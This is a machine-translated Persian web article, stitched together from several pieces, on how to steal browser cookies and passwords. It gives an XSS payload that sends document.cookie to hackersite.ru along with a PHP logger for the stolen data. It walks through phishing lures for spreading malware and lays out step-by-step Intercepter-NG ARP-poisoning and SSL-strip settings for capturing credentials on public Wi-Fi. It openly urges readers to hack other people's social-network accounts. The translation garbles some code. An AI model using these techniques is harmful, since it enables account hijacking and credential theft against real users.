منو
خانهمتفرقه

یک راه آسان برای سرقت کوکی ها روش های سرقت کوکی ها دانلود برنامه برای سرقت کوکی ها

آیا متوجه شده اید که وقتی به سایتی که قبلاً بازدید کرده اید باز می گردید، سایت شما را می شناسد و با تنظیماتی که دفعه قبل اعمال کرده اید باز می شود؟ بله، و اغلب؟ این به لطف کوکی‌هایی اتفاق می‌افتد که اطلاعات مربوط به بازدیدکنندگان مانند ورود، رمز عبور، شناسه جلسه و سایر متغیرهای مورد نیاز برای شناسایی بازدیدکننده و نمایش محتوای صفحه را با توجه به اولویت‌های کاربر انتخاب شده در آخرین بازدید از منبع ذخیره می‌کنند. برنامه WebCookiesSniffer کوکی ها و محتویات آنها را در سایت هایی که کاربر در مرورگر مشاهده می کند به کاربر نشان می دهد.

مشاهده کوکی ها

شما یک وب سایت باز می کنید و WebCookiesSniffer عکس می گیرد بیسکویت ها s در زمان واقعی. این ابزار همه کوکی‌های گرفته شده را به جدولی اضافه می‌کند که داده‌های مربوط به میزبان، مسیر درخواست، طول کل فایل کوکی، تعداد متغیرهای موجود در فایل کوکی و خود کوکی را با نام متغیرها و مقادیر ذخیره می‌کند. WebCookiesSniffer ممکن است اطلاعات جمع آوری شده درباره کوکی ها را در آن ذخیره کند فایل متنی. این برنامه همچنین توانایی ایجاد یک گزارش HTML برای همه یا کوکی های انتخاب شده را دارد. برای اینکه برنامه کار کند، باید درایور WinPcap (که در بایگانی به همراه WebCookiesSniffer قرار دارد) را نصب کنید. برای تغییر زبان برنامه WebCookiesSniffer به روسی، فایل WebCookiesSniffer_lng.ini (همچنین در بایگانی موجود است) را در دایرکتوری همراه با ابزار کپی کنید.

تصاویری از برنامه WebCookiesSniffer


راه های سرقت کوکی ها

این روش هک، سرقت کوکی ها، عالی عمل می کند و توسط بسیاری از هکرها استفاده می شود. اگر شما نیز می خواهید آن را امتحان کنید، اما نمی دانید چه کاری انجام دهید، توصیه های ما را بخوانید.

کوکی ها چیست؟

این اطلاعات مربوط به بازدید کاربر از یک سایت خاص است. در یک سند متنی جداگانه ذخیره می شود. در آنجا می توانید اطلاعات مختلفی پیدا کنید. از جمله ورود، رمز عبور، آدرس صندوق های پستیو شماره تلفن به همین دلیل است که سارقان تلاش می کنند تا به این اسناد دست یابند. هکرها برای سرقت مواد مورد نیاز خود به روش های مختلفی متوسل می شوند.

راه های سرقت کوکی ها

آسیب پذیری XSS

می توان آن را در هر وب سایتی یافت و استفاده کرد. وقتی یک متخصص آسیب پذیری پیدا می کند، آن را اجرا می کند کد ویژه. بسته به هدف، کدها متفاوت هستند؛ آنها برای یک منبع خاص نوشته می شوند. هنگامی که کاربر از این صفحه بازدید می کند و آن را به روز می کند، همه تغییرات اعمال می شود. کد شروع به عمل می کند - در رایانه قربانی تعبیه شده و همه را جمع آوری می کند اطلاعات لازماز مرورگر

برای معرفی کد، می توانید از هر نوع آسیب پذیری استفاده کنید - خطا در یک منبع وب، در یک مرورگر یا در یک سیستم کامپیوتری.

2 نوع حمله XSS وجود دارد:

منفعل - به اسکریپت صفحه هدایت می شود. در این مورد، باید به دنبال آسیب پذیری در عناصر صفحه باشید. به عنوان مثال، یک برگه گفتگو، یک کادر جستجو، یک کاتالوگ ویدئو و غیره.

فعال - شما باید آنها را در سرور جستجو کنید. آنها به ویژه در انجمن ها، وبلاگ ها و چت های مختلف فراوان هستند.

چگونه یک فرد را مجبور به اعمال XSS کنیم؟

این کار آسان نیست، زیرا اغلب برای فعال کردن کد باید روی پیوند با آن کلیک کنید. می توانید پیوند را پنهان کنید و آن را در یک ایمیل همراه با یک پیشنهاد جالب ارسال کنید. به عنوان مثال، یک تخفیف بزرگ در یک فروشگاه آنلاین ارائه دهید. شما همچنین می توانید همه اینها را در تصویر پیاده سازی کنید. کاربر به احتمال زیاد آن را مشاهده خواهد کرد و به چیزی مشکوک نخواهد شد.

نصب اسنیفر

این یک پیاده سازی است برنامه های تخصصیبرای نظارت بر ترافیک در دستگاه شخص دیگری. sniffer به شما امکان می دهد جلسات ارسال شده را با داده های افراد دیگر رهگیری کنید. به این ترتیب می‌توانید همه لاگین‌ها و رمزهای عبور، آدرس‌ها، هر کدام را دریافت کنید اطلاعات مهمتوسط کاربر از طریق شبکه منتقل می شود. در این مورد، حملات اغلب بر روی داده های HTTP محافظت نشده انجام می شود. وای فای ناامن برای این کار خوب عمل می کند.

چندین روش برای اجرای sniffer وجود دارد:

  • کپی ترافیک؛
  • تجزیه و تحلیل داده ها با استفاده از حملات ترافیکی؛
  • گوش دادن به رابط ها؛
  • معرفی یک sniffer به یک کانال شکستن.
جایگزینی کوکی ها

تمام داده ها به شکل اصلی خود در وب سرور ذخیره می شوند. اگر آنها را تغییر دهید، این یک جایگزین در نظر گرفته می شود. تمام مواد دریافتی را می توان در رایانه دیگری استفاده کرد. به این ترتیب دریافت خواهید کرد دسترسی کاملبه اطلاعات شخصی کاربر می‌توانید کوکی‌ها را با استفاده از تنظیمات مرورگر، افزونه‌ها یا برنامه‌های خاص تغییر دهید. ویرایش همچنین در هر دفترچه یادداشت استاندارد روی رایانه شخصی امکان پذیر است.

سرقت کوکی ها با استفاده از ویروس

کارشناسان توصیه می کنند که از کوکی ها استفاده نکنید مگر اینکه نیاز خاصی به آن وجود داشته باشد. اگر امکان غیرفعال کردن آنها وجود دارد، بهتر است این کار را انجام دهید. این به این دلیل است که کوکی ها بسیار آسیب پذیر هستند. آنها اغلب توسط مجرمان سرقت می شوند. حجم عظیمی از اطلاعات شخصی را می توان از این فایل ها به دست آورد. اطلاعات محرمانه، که علیه شخص مورد استفاده قرار خواهد گرفت. خطرناک ترین نوع فایل ها آنهایی هستند که پس از پایان جلسه در سیستم باقی می مانند.

کوکی ها اغلب با استفاده از یک ابزار ویروسی به سرقت می روند. این کار به سادگی انجام می شود. هر ابزار ایمن با ویروسی تعبیه شده است که مواد خاصی را روی رایانه جمع آوری می کند. برنامه ویروسیبه سرور صاحب آن متصل خواهد شد. برنامه باید طوری پیکربندی شود که مرورگر از آن به عنوان سرور پروکسی استفاده کند.

هنگامی که برنامه به رایانه شخصی قربانی می رسد، به طور خودکار شروع به جمع آوری تمام داده های ذخیره شده و ارسال آن به شما می کند.

ویروس ها متفاوت هستند، عملکرد آنها نیز ممکن است متفاوت باشد. برخی به شما این امکان را می دهند که به طور کامل مرورگر را کنترل کنید و هرگونه اطلاعات را مشاهده کنید. دیگران قادر به سرقت مواد محافظت شده هستند. برخی دیگر فقط داده های ناامن را جمع آوری می کنند.

ممکن است برای معرفی یک برنامه ویروس به رایانه شخص دیگری مشکل داشته باشید. لازم است کاربر را مجبور به دانلود و اجرای آن کنید. در اینجا می توانید نامه ای به همراه لینک برنامه برای او بفرستید یا برنامه را به عنوان امن منتقل کنید و منتظر بمانید تا شخص آن را از وب سایت شما دانلود کند.

چگونه از کوکی ها در برابر سرقت محافظت کنیم؟

بیشتر منابع وب به اندازه کافی محافظت نمی شوند. هکرها به راحتی آسیب پذیری ها و باگ ها را در این پلتفرم ها پیدا می کنند.

قوانین حفاظت از کوکی:

  1. شناسه رایانه را به جلسه فعلی پیوند دهید. سپس، هنگامی که از یک دستگاه شخص ثالث وارد سایت می شوید، یک جلسه جدید شروع می شود و داده های مربوط به جلسه قبلی بازیابی نمی شود.
  2. جلسه را به مرورگر پیوند دهید. همان اصل مانند پاراگراف قبل عمل خواهد کرد.
  3. رمزگذاری پارامترهای ارسال شده از طریق شبکه سپس اطلاعات ذخیره شده در سند قابل درک نخواهد بود. برای کسی که رهگیری کرده بی فایده خواهد بود. این تکنیک 100٪ از شما محافظت نمی کند؛ برخی از متخصصان می توانند هر ماده ای را رمزگشایی کنند.
  4. یک پوشه جداگانه برای شناسه ها ایجاد کنید.

چگونه از طریق کوکی ها رمز اکانت شخص دیگری را پیدا کنیم؟

برای به دست آوردن اطلاعات ورود به سیستم شخص دیگری، ابتدا باید به فایلی که در آن ذخیره شده است بروید.

برای کسانی که استفاده می کنند موزیلا فایرفاکسباید به تب tools بروید که در منوی اصلی قرار دارد. بعد در تنظیمات سیستم، بخش "محافظت" را پیدا خواهید کرد، جایی که باید تمام اطلاعات مهم در مورد حساب ها را در شبکه های اجتماعی جستجو کنید. همه رمزهای عبور پنهان هستند، بنابراین روی دکمه "نمایش" کلیک کنید. شما می توانید بلافاصله محافظت را نصب کنید و یک کد ویژه قرار دهید. سپس هیچکس جز شما این اطلاعات را دریافت نخواهد کرد.

در Opera فقط نام های کاربری برای مشاهده عمومی در دسترس هستند. اما در منو می توانید یک مدیر رمز عبور پیدا کنید و همه چیز ذخیره شده در رایانه خود را مشاهده کنید. لیست کاملدر مدیر است. برای دسترسی به رمزهای عبور، باید افزونه دیگری را نصب کنید.

که در گوگل کرومهمه این مواد را می توان در تنظیمات پیشرفته مشاهده کرد. یک برگه با تمام کوکی های ذخیره شده وجود دارد.

متاسفانه مرورگر استاندارد اینترنت اکسپلوررچنین عملکردهایی را ندارد. برای کسب اطلاعات در مورد پلتفرم های وب که صاحب رایانه از آنها بازدید می کند، باید یک برنامه ویژه را دانلود کنید. شما می توانید آن را به صورت رایگان در اینترنت پیدا کنید، کاملا امن است، اما بهتر است آن را از منابع معتبر دانلود کنید. فراموش نکنید که هر برنامه ای باید توسط آنتی ویروس اسکن شود. این به ویژه برای آن دسته از ابزارهایی که با رمزهای عبور کار می کنند صادق است.

این تکنیک فقط برای کسانی مناسب است که دسترسی فیزیکی به کامپیوتر قربانی دارند. همچنین اگر شخص از طریق رایانه شخصی شما وارد پلتفرم شده باشد و داده های خود را ذخیره کرده باشد، می توانید رمز عبور شخص دیگری را نیز پیدا کنید.

برنامه هایی برای سرقت کوکی ها

انجمن های هکرهای زیادی در اینترنت وجود دارد که در آن هکرها با یکدیگر ارتباط برقرار می کنند. مردم به امید رسیدن به آنجا می روند کمک رایگان. آنجاست که می توانید تعداد زیادی برنامه مختلف برای هک پیدا کنید. ما می خواهیم به شما هشدار دهیم که نباید به این برنامه ها اعتماد کنید. ابزارهای کمکی برای سرقت کوکی ها از راه دور از دستگاه شخص دیگری، برنامه های ساختگی یا ویروسی هستند. اگر این نرم افزار را بر روی کامپیوتر خود دانلود کنید، به احتمال زیاد در دام یک کلاهبردار قرار خواهید گرفت. کلاهبرداران برنامه ها را به صورت رایگان ارسال می کنند. بنابراین، آنها نرم افزار ویروس را توزیع می کنند و کنترل رایانه های شخصی دیگران را به دست می آورند. به طور کلی، چنین برنامه هایی کلاهبرداری هستند، این را با رابط کاربری و محتوای آنها متوجه خواهید شد. اگر قصد دارید از هر نرم افزاری برای استخراج فایل ها استفاده کنید، بگذارید sniffers باشد. البته استفاده از آنها چندان آسان نیست. و پیدا کردن یک اسنیفر خوب در اینترنت کار آسانی نیست. اما چنین نرم افزاری در دسترس متخصصانی است که می توانند آن را با پول به شما بفروشند. به یاد داشته باشید که کلاهبرداران زیادی وجود دارند که هر کدام ترفندهای خاص خود را دارند. شما فقط باید به هکرهای قابل اعتمادی اعتماد کنید که شهرت خوبی دارند، نظرات خود را دارند و وب سایت خود را دارند.

در خاتمه، می خواهم توجه داشته باشم که سرقت کوکی ها یک روش واقعا قدرتمند است که اثربخشی آن بسیار بالا است. اگر می خواهید پروفایل شخصی را در یک شبکه اجتماعی یا پیام رسان فوری هک کنید، حتما این گزینه را در نظر بگیرید. این روش زمانی بهترین کار را دارد که بتوانید از رایانه قربانی استفاده کنید. به دست آوردن مواد از راه دور بسیار دشوارتر است، اما می توانید از نکات ما استفاده کنید و سعی کنید این روش را عملی کنید.

در فصل

کوکی چیست؟

مکانیزمی وجود دارد که به سرور http اجازه می دهد مقداری را ذخیره کند اطلاعات متنیو سپس با او تماس بگیرید. این اطلاعاتبه نام کوکی در اصل، هر کوکی یک جفت است: نام یک پارامتر و مقدار آن. به هر کوکی دامنه ای که به آن تعلق دارد نیز اختصاص داده می شود. به دلایل امنیتی، در تمام مرورگرها سرور http فقط اجازه دسترسی به کوکی دامنه خود را دارد. علاوه بر این، کوکی‌ها ممکن است تاریخ انقضا داشته باشند، در این صورت حتی اگر تمام پنجره‌های مرورگر را ببندید، تا این تاریخ در رایانه ذخیره می‌شوند.


چرا کوکی ها مهم هستند؟

همه سیستم های چند کاربره از کوکی ها برای شناسایی کاربر استفاده می کنند. به طور دقیق تر، اتصال فعلی کاربر به سرویس، جلسه کاربر. اگر شخصی کوکی های شما را بشناسد، می تواند از طرف شما وارد سیستم شود. زیرا در حال حاضر تعداد کمی از منابع اینترنتی تغییرات آدرس IP را در طول یک جلسه کاربر بررسی می کنند.


چگونه کوکی ها را تغییر یا جایگزین کنیم؟

توسعه دهندگان مرورگر ابزارهای داخلی را برای ویرایش کوکی ها ارائه نمی کنند. اما می توانید با یک دفترچه یادداشت معمولی از پس آن بربیایید.


مرحله 1: یک فایل متنی با متن ایجاد کنید

ویرایشگر رجیستری ویندوز نسخه 5.00



@="C:\\IE_ext.htm"

آن را با نام IE_ext.reg ذخیره کنید

مرحله 2: با استفاده از فایل ایجاد شده، تغییرات را به رجیستری ویندوز اضافه کنید.

مرحله 3: یک فایل متنی با متن ایجاد کنید

< script language="javascript">
external.menuArguments.clipboardData.setData("متن"، external.menuArguments.document.cookie);

external.menuArguments.document.cookie= "testname=testvalue; path=/; domain=testdomain.ru";
هشدار (external.menuArguments.document.cookie);


آن را با نام C:\IE_ext.htm ذخیره کنید

مرحله 4: به وب سایت مورد علاقه خود می رویم.

مرحله 5: روی فضای خالی صفحه کلیک راست کرده و آیتم منو را انتخاب کنید "کار با کوکی ها". اجازه دسترسی به کلیپ بورد. کوکی های شما از این سایت به کلیپ بورد می روند. می توانید دفترچه یادداشت آنها را وارد کنید و نگاهی بیندازید.


مرحله 6: برای تغییر برخی از کوکی ها، فایل C:\IE_ext.htm را ویرایش کنید و جایگزین کنید. نام آزمونبه نام کوکی، ارزش آزمایشی- در معنای آن، testdomain.ru– به دامنه سایت. در صورت لزوم، خطوط مشابه بیشتری اضافه کنید. برای سهولت کنترل، خروجی کوکی‌های فعلی را قبل و بعد از تغییر به اسکریپت اضافه کردم: هشدار (external.menuArguments.document.cookie);

مرحله 7: مرحله 5 را دوباره انجام دهید و سپس صفحه را بازخوانی کنید.

خط پایین: ما با کوکی های به روز شده به این منبع اینترنتی دسترسی خواهیم داشت.

چگونه با استفاده از جاوا اسکریپت کوکی ها را بدزدیم؟

اگر مهاجمی بتواند فرصتی برای اجرای یک اسکریپت جاوا اسکریپت دلخواه در رایانه قربانی پیدا کند، آنگاه می‌تواند کوکی‌های فعلی را به راحتی بخواند. مثال:


var str= document.cookie;

اما آیا او می تواند آنها را به سایت خود منتقل کند، زیرا همانطور که قبلاً اشاره کردم، یک اسکریپت جاوا اسکریپت نمی تواند بدون تأیید اضافی به سایتی که در دامنه دیگری قرار دارد دسترسی پیدا کند؟ به نظر می رسد که یک اسکریپت جاوا اسکریپت می تواند هر تصویری را که در هر سرور http قرار دارد بارگیری کند. در عین حال هرگونه اطلاعات متنی در درخواست دانلود را به این تصویر منتقل کنید. مثال: http://hackersite.ru/xss.jpg?text_infoبنابراین اگر این کد را اجرا کنید:

var img= عکس جدید()؛

img.src= "http://hackersite.ru/xss.jpg؟"+ encodeURI (document.cookie)؛


سپس کوکی به درخواست دانلود "تصویر" ختم می شود و به مهاجم "می رود".

چگونه می توان با چنین درخواست هایی برای دانلود یک "تصویر" برخورد کرد؟

یک مهاجم فقط باید میزبانی با پشتیبانی PHP پیدا کند و کدهایی مانند این را در آنجا قرار دهد:

$uid=urldcode($_SERVER["QUERY_STRING"]);
$fp=fopen("log.txt"،"a");
fputs($fp,"$uid\n");
fclose($fp);
?>

سپس تمام پارامترهای درخواست برای این اسکریپت در فایل ذخیره می شود log.txt. تنها چیزی که باقی می ماند جایگزینی اسکریپت جاوا اسکریپت توصیف شده قبلی است http://hackersite.ru/xss.jpgبه مسیر این اسکریپت php.


خط پایین

من فقط ساده ترین راه را برای سوء استفاده از آسیب پذیری های XSS نشان دادم. اما این ثابت می‌کند که وجود حداقل یکی از این آسیب‌پذیری‌ها در یک سایت اینترنتی چند کاربره می‌تواند به مهاجم اجازه دهد از منابع آن از طرف شما استفاده کند.

سلام، این مقاله کوتاه، نه حتی یکنواخت توضیح کوتاهدوست دارم خودم را وقف کنم راه سادهرهگیری کوکی ها در شبکه های وای فای. اگر شخصی علاقه مند به رهگیری "کالاهای پخته شده" باشد، در اینجا به شما نمی گویم کوکی ها چیست و چرا به آنها نیاز است. در یک شبکه بی سیم، من فکر می کنم او باید بداند که چیست و چرا به آن نیاز دارد. من فقط یک چیز را می گویم: با استفاده از این فایل ها می توانید به حساب های افراد دیگر در سایت های مختلف دسترسی پیدا کنید که کاربران را ملزم به انجام فرآیند احراز هویت می کند (به عنوان مثال، mail.ru، vkontakte.ru و غیره).

پس بیایید شروع کنیم. ابتدا باید آن را پیدا کنیم شبکه بی سیم، با یک دروازه دسترسی به اینترنت باز است و مطلوب است که این شبکه مشتریان بسیار زیادی داشته باشد. به عنوان مثال، هر شبکه ای در مناطق بزرگ این کار را انجام می دهد. مراکز خرید، فرودگاه ها، کافی شاپ های مختلف، در چنین مکان هایی معمولا مردم استفاده می کنند دسترسی به وای فایدر اینترنت، برای خواندن نامه، چک کردن حساب ها در سایت های دوستیابی مختلف، مشاهده LJ و انجمن های مختلف. این دقیقاً همان چیزی است که ما نیاز داریم. پس از تصمیم گیری در مورد انتخاب مکان شبکه، با مطالعه ساعات مشخصی از حداکثر تعداد مشتریان، اجازه دهید مستقیماً به عملیات رزمی برویم. برای این ما به یک لپ تاپ نیاز داریم آداپتور وای فای، و مجموعه خاصی از برنامه ها. در مورد من استفاده کردم لپ تاپ ایسر Aspire 3610، کارت وای فای مشتری D-Link DWL G650 و سیستم عامل BackTrack3 نصب شده است.

من به شما توصیه می کنم از این سیستم عامل استفاده کنید، زیرا از قبل شامل کل مجموعه برنامه هایی است که ممکن است به آن نیاز داشته باشید، و مهمترین مزیت این است که شما مجبور نیستید Backtrack را بر روی خود نصب کنید. HDD، می توانید این سیستم عامل را مستقیماً از یک سی دی یا فلش درایو بوت کنید.

حال به سراغ نرم افزارهای لازم می رویم. من از kismet برای کشف شبکه و WifiZoo برای رهگیری کوکی ها استفاده کردم. من به طور مفصل در مورد برنامه دوم صحبت خواهم کرد. WifiZoo یک اسکنر امواج هوایی غیرفعال است و مقدار زیادی را جمع آوری می کند اطلاعات مفیدمانند: pop3، ترافیک smtp، http cookies/authinfo، msn، اعتبارنامه ftp، ترافیک شبکه telnet، nbt و غیره. تنها ایراد این برنامه عدم وجود حالت پرش کانال است، WifiZoo به سادگی به رابط بی سیم گوش می دهد و به اصطلاح نمی تواند از کانالی به کانال دیگر بپرد. اما این عیب با برنامه دیگری به نام Kismet که از این حالت پشتیبانی می کند جبران می شود. برای راه اندازی WifiZoo شما نیاز دارید:

  • پایتون
  • پوسته پوسته شدن
  • کیسمت

پس بیایید برنامه را راه اندازی کنیم، ابتدا Kismet را برای پشتیبانی از حالت پرش کانال راه اندازی می کنیم، سپس WifiZoo را مستقیماً راه اندازی می کنیم، پنجره زیر باید در مقابل شما ظاهر شود:

اکنون تنها چیزی که باقی می‌ماند این است که بنشینید و منتظر بمانید تا چیزی را رهگیری کنید؛ هر چیزی که برنامه رهگیری می‌کند را می‌توان در لاگ‌هایی که در دایرکتوری با برنامه /logs/ قرار دارند، پیدا کرد. همچنین می توانید یک رابط رابط کاربری گرافیکی راه اندازی کنید که به طور خودکار به http در 127.0.0.1:8000 متصل می شود.

من در مورد تمام ویژگی های این برنامه فوق العاده نمی نویسم، فکر می کنم بقیه احتمالات را خودتان متوجه خواهید شد و از آنجایی که این لحظهما فقط به کوکی ها علاقه مندیم. روی پیوندی که می گوید کوکی ها کلیک کنید و ببینید چه چیزی را رهگیری کردیم:

درباره خطرات نقاط دسترسی Wifi باز، در مورد نحوه رهگیری رمزهای عبور.

امروز ما به رهگیری رمزهای عبور از طریق Wi-Fi و رهگیری کوکی ها از طریق Wi-Fi با استفاده از این برنامه خواهیم پرداخت.

حمله به دلیل بو کشیدن.

بو کشیدن- sniff به عنوان "Sniff" ترجمه می شود. استشمام به شما امکان تجزیه و تحلیل را می دهد فعالیت شبکهدر شبکه، مشاهده کنید که کاربر از کدام سایت ها بازدید می کند و رمزهای عبور را رهگیری می کند. اما می توان از آن برای اهداف مفید نیز استفاده کرد، برای گوش دادن به ویروس هایی که هر داده ای را به اینترنت می فرستند.


روشی که نشان خواهم داد کاملا ابتدایی و ساده است. در واقع می توانید از برنامه قوی تری استفاده کنید.
وب سایت رسمی برنامه sniff.su (لینک را کپی کنید و در یک تب جدید باز کنید) می توانید آن را در قسمت دانلود کنید. "دانلود".
یک نسخه برای ویندوز وجود دارد سیستم های یونیکسو برای اندروید
ما برای ویندوز در نظر خواهیم گرفت زیرا این محبوب ترین سیستم است و در اینجا برنامه پیشرفته ترین است.
مرورگر یا آنتی ویروس شما ممکن است از خطرناک بودن برنامه شکایت کند، اما شما خودتان متوجه می شوید که این یک برنامه هک است و همیشه به چنین هک هایی پاسخ می دهد.
برنامه در یک آرشیو فشرده دانلود می شود، فقط باید برنامه را در یک پوشه از حالت فشرده خارج کنید و از آن استفاده کنید، نیازی به نصب نیست.
این برنامه قابلیت سازماندهی حملات Mitm مختلف بر روی شبکه های Wi-Fi را دارد.
مقاله صرفاً برای مقاصد اطلاعاتی نوشته شده است تا به عنوان مثال خطرات باز بودن را نشان دهد نقاط وای فایهر اقدامات مشخص شده، شما با خطر و خطر خود عمل می کنید. و من می خواهم مسئولیت کیفری برای محافظت از داده های دیگران را به شما یادآوری کنم.

سرویس avi1قیمت های نفس گیر ارزانی را برای فرصت سفارش مشترکین به پروفایل اینستاگرام خود ارائه می دهد. همین الان، بدون صرف تلاش و زمان زیاد، به محبوبیت یا فروش آنلاین بیشتری دست پیدا کنید.

کار با برنامه Intercepter NG

بنابراین، برنامه از طریق Intercepter-NG.exe راه اندازی می شود.
این برنامه دارای یک رابط انگلیسی است، اما اگر شما یک کاربر کامپیوتر مطمئن هستید، فکر می کنم آن را متوجه خواهید شد.

در زیر ویدیویی در مورد راه اندازی (برای کسانی که ترجیح می دهند به جای خواندن تماشا کنند) وجود دارد.
- انتخاب کنید شبکه مورد نظردر بالا اگر چندین مورد از آنها را دارید.
- نوع را تغییر دهید اترنت/وای فای، اگر Wi Fi دارید، باید نماد Wi FI (در سمت چپ انتخاب شبکه) را انتخاب کنید.

- دکمه را فشار دهید حالت اسکن(نماد رادار)
- در یک قسمت خالی کلیک راست کرده و روی آن کلیک کنید منوی زمینه اسکن هوشمند
- همه دستگاه های متصل به شبکه ظاهر می شوند
- قربانی را انتخاب کنید (با نگه داشتن کلید Shift می توانید همه را انتخاب کنید)، فقط خود روتر را علامت گذاری نکنید، IP آن معمولاً 192.168.1.1 است.
- پس از انتخاب، کلیک راست کرده و کلیک کنید به nat اضافه کنید


- به برگه بروید نات
- که در آی پی مخفیتوصیه می شود آخرین رقم را به هر رقم خالی تغییر دهید، این باعث می شود IP واقعی شما پنهان شود.
- تیک بزن نوار SSLو SSL Mitm.


- کلیک تنظیمات(دنده سمت راست).
- تیک بزن رستاخیز(این به شما امکان می دهد رمزهای عبور و کوکی های پروتکل Https رمزگذاری شده را رهگیری کنید) و حذف کنید جعل IP/Mac. می توانید کادر را علامت بزنید قاتل کوکیبرای مثال، به لطف او، قربانی از صفحه فعلی اخراج می شود شبکه اجتماعیو قربانی باید رمز عبور را دوباره وارد کند و ما آن را رهگیری خواهیم کرد. تنظیمات را با تصویر مقایسه کنید.


- در اینجا تنظیمات کامل شده است، تنظیمات را با یک علامت ببندید.
- تنظیمات کامل شده است، می توانید حمله را شروع کنید.
- دکمه را در بالا فشار دهید شروع/ توقف بوییدن(مثلث)، در همان پنجره روی نماد تابش در پایین کلیک کنید Start/Stop ARP Poison
- به برگه بروید حالت رمز عبورو در پنجره کلیک راست کرده و انتخاب کنید نمایش کوکی ها("این اجازه می دهد تا کوکی ها و رمزهای عبور وارد شده توسط قربانیان نشان داده شوند")
تمام شد، منتظریم کسی رمز را وارد کند.
گاهی اوقات اتفاق می افتد که اینترنت از کار می افتد، سعی کنید خودتان به اینترنت دسترسی داشته باشید، اگر کار نکرد، برنامه را مجددا راه اندازی کنید.
من متوجه شدم که همیشه نمی توان رمز عبور را رهگیری کرد، اما در واقع تقریباً بدون شکست کار می کند.

این همه چیز است، ما رهگیری رمزهای عبور از طریق Wi-Fi و رهگیری کوکی ها از طریق Wi-Fi را بررسی کردیم.

مراقب خودت باش